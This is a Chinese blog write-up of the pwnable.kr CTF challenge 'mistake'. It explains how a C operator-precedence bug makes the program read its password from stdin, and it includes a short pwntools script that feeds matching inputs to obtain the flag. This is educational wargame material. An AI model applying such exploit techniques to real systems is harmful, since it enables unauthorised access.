pwnable 笔记 Toddler's Bottle - mistake

最新推荐文章于 2020-06-08 14:59:54 发布
最新推荐文章于 2020-06-08 14:59:54 发布
阅读量995 收藏
点赞数
分类专栏: pwn pwnable.kr 题解 文章标签: pwnable
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SmalOSnail/article/details/53193001
版权

这题考察对c语言的运算符优先级的理解

mistake

题目源码

sourcecode

题目分析

先看一遍代码,程序开始的时候调用open()打开文件password
open()函数如果成功打开了文件,会返回一个正整数值,如果失败,会返回-1
仔细的看一下下面这段代码,可以发现这里出了一个小错误

if(fd=open("/home/taqini/pwnable/mistake/password",O_RDONLY,0400) < 0)

关系运算符<的优先级要高于赋值运算符=,这里先执行判断语句:

open("/home/taqini/pwnable/mistake/password",O_RDONLY,0400) < 0

如果open()成功打开文件,将返回一个正整数,这个数小于0必然不成立,所以这个判断语句返回的结果是False也就是0,之后再执行赋值语句

fd = 0

这样只要文件打开成功,fd就会等于0(表示stdin文件)

这导致了后面read()本来应该从password文件中读数据,现在却变成了从stdin中读取数据

if(!(len=read(fd,pw_buf,PW_LEN) > 0))

这里read()从标准输入文件中读取了10个字节的数据,存到了pw_buf中,pw_buf中原本应该存储password的前10个字节,现在变成了存储stdin中的前10个字节。

所以我们只需要在标准输入中写上10个字节的数据,这10字节的数据就是pw_buf

之后scanf()读取pw_buf2,pw_buf2的每一位和1异或后与pw_buf对比,相等的话,打印出flag

解题思路

  1. stdin中输入pw_buf
  2. pw_buf1按位异或后得到pw_buf2
  3. 输入pw_buf2

解题脚本

#!/usr/bin/python
from pwn import *
from time import sleep

target = process('/home/mistake/mistake')
pw_buf = "A"*10
pw_buf2 = ""
for c in pw_buf:
    pw_buf2 += chr(ord(c)^1)
target.sendline(pw_buf) 
sleep(20)
target.read()
target.sendline(pw_buf2)
target.interactive()

ans

TaQini852
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Toddler-care-website:使用 Django 的互联网编程实验室迷你项目
08-04
在这个项目中,可能会有一个名为`toddler_care`的应用,包含了模型、视图、模板和静态文件。 3. **数据库模型**:在`models.py`文件中定义数据库模型,如`Nanny`(保姆)、`Product`(产品)和`Order`(订单)。...
Toddler Tap-开源
07-20
【 Toddler Tap 开源项目详解】 “Toddler Tap”是一个专为幼儿设计的开源软件,旨在激发孩子们对键盘和字母的初步认知。这个项目源于一个简单而温馨的观察:当小孩子们看到大人在电脑上敲击键盘时,他们通常会表现...
[Toddler's Bottle]-[leg]
ACdream
07-25 435
真心好久没有开新题了,没有忘记pwn这个事情的 先说说这个题的重点在哪儿 重点在于两个地方: A:这个是一个汇编题,与熟悉的X86的汇编语句不一样,很明显需要去查询其他汇编语言的相关知识,考验自学能力 B:关键代码在main中: key1()+key2()+key3()) == key key是输入的一个值,key1(),key2(),key3()都是汇编函数中的返回的固定值,
[Toddler's Bottle]flag
jmp esp
04-28 473
好吧,一个用upx压缩后的64位elf,拿着原文件看了半天啥都没看出来。。最后只能找别人的答案了。。。upx介绍https://zh.m.wikipedia.org/wiki/UPX解题upx -d flag 然后拿出来到IDA里边有一个flag直接就找到了
Pwnable】[Toddler's Bottle]--flag
VZZmieshenquan的博客
02-15 148
Description: Papa brought me a packed present! let’s open it. Download : http://pwnable.kr/bin/flag This is reversing task. all you need is binary Solution: 拿到题先去nc一下……好吧这道题没有这种操作 下载好文件,先做基础两步 发现...
pwnable 笔记 Toddler's Bottle -passcode
pumpkin9
04-01 218
题目 用ssh连接一下 运行一下passcode 竟然发现错误。。 可以发现需要输入 name passcode1 passcode2 再查看一下源代码 这个题一共有两个函数welcome()和login() welcome中输入了name,并且字符串大小是100 login中输入了pass code1 和passcode2 在passcode1=338150(0...
A Toddler Game-开源
05-26
至于“Toddler-windows”这个文件,很可能是游戏的Windows版本安装包或者执行文件。这意味着开发者已经为Windows用户提供了一个方便的执行版本,无需在Windows环境中自行编译源代码,简化了用户的使用流程。 总的来...
Kids Key - Alphabet Training for Toddler-开源
04-28
"Kids Key - Alphabet Training for Toddler" 是一款专为1至4岁孩子设计的开源软件,旨在通过字母和色彩的互动游戏,帮助孩子们轻松学习ABC和颜色识别,同时也为他们初步接触数字概念提供了趣味性的平台。...
toddler-ng:下一代Toddler,一款精心设计的可用便携式微内核操作系统
03-05
幼儿下一代幼儿主要目标用C99编写...并兼容多引导更多架构-OpenRISC,HPPA,SuperH,IA64,s390,VAX状态计划=尚未开始初始=初步探索活动=积极开发当前=最新拱目标装载机哈尔笔记ia32-pc-multiboot 当前的积极的需进行
PEDA用法总结
热门推荐
HiTaQini
11-13 2万+
PEDA用法总结 一个强大的GDB插件  PEDA是为GDB设计的一个强大的插件,全称是Python Exploit Development Assistance for GDB。它提供了很多人性化的功能,比如高亮显示反汇编代码、寄存器、内存信息,提高了debug的效率。同时,PEDA还为GDB添加了一些实用新的命令,比如checksec可以查看程序开启了哪些安全机制等等,后续会介绍.
scanf忘记加'&'危害有多大? 详解GOT表覆写攻击技术
HiTaQini
11-20 8668
初学C语言时,大家有没有遇到过这样的情景? 在使用`scanf()`函数时,忘记加取地址符号`&`. 结果程序报错,debug了半天,恍然发现,原来是忘记加坑爹的`&`。 本文通过讲解一道pwnable.kr上的got表覆写题目,详细的解读GOT覆写技术,讲一讲`scanf`不加`&`到底有多坑。
初探ROP攻击 Memory Leak & DynELF
HiTaQini
11-28 6091
前言通过泄露内存的方式可以获取目标程序libc中各函数的地址,这种攻击方式可以绕过地址随机化保护。下文通过一个例子讨论泄露内存的ROP攻击。 (ps.本文中的源代码大家可以去我的Github中下载,链接在文章结尾。实践才会出真知啊~)
CTFd一键部署Pwn题目动态靶机
HiTaQini
04-01 5824
pwn-docker是我写的一个用于自动生成pwn题目docker镜像的脚本,功能如下:1. 使用ctf_xinetd控制权限; 2.动态靶机环境+动态flag(由CTFd-whale生成)3.无需修改配置,一键生成镜像
手把手教你写纯字符ascii shellcode——最通俗易懂的alphanumeric shellcode生成指南
HiTaQini
05-31 5251
ascii shellcode : 自动生成shellcode,手写shellcode
pwnable 笔记 Rookiss - fsb - 20 pt
HiTaQini
12-17 3139
典型的格式化字符串漏洞
pwnable 笔记 Rookiss - brain fuck - 150 pt
HiTaQini
12-15 3077
终于打到第二关了... 这题考察GOT覆写
适合初学者的ROP攻击入门教程 - [Pwn] ROP Emporium Guide
HiTaQini
06-08 3019
ROP Emporium 是一个ROP攻击入门教学网站,提供了一系列的挑战任务,这些挑战对逆向工程或debug的要求不高,因此对初学者十分友好,适合初学者了解ROP攻击。网站中共有8个挑战任务,每个挑战都引入了一个新概念/知识点,其复杂性和难度逐渐增加,循序渐进,而且每个挑战都有32/64位两个版本的程序,适合初学者了解二者之间的差异。
pwnable 笔记 Toddler's Bottle - passcode
HiTaQini
11-03 2913
这题涉及到GOT覆写技术,我更新了一篇讲GOT覆写的文章,以这道题做的例子,讲的比较详细,大家可以参考一下: http://blog.csdn.net/smalosnail/article/details/53247502
字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转为java数组
最新发布
12-07
以下是将字符串["Baby","Toddler","Kids","Matching-Outfits","Maternity-Nursing","Licensed-Characters","Home-Baby-Gear","Shoes-Accessories"]转换为Java数组的代码示例: ```java String[] strArr = {"Baby",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TaQini852

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值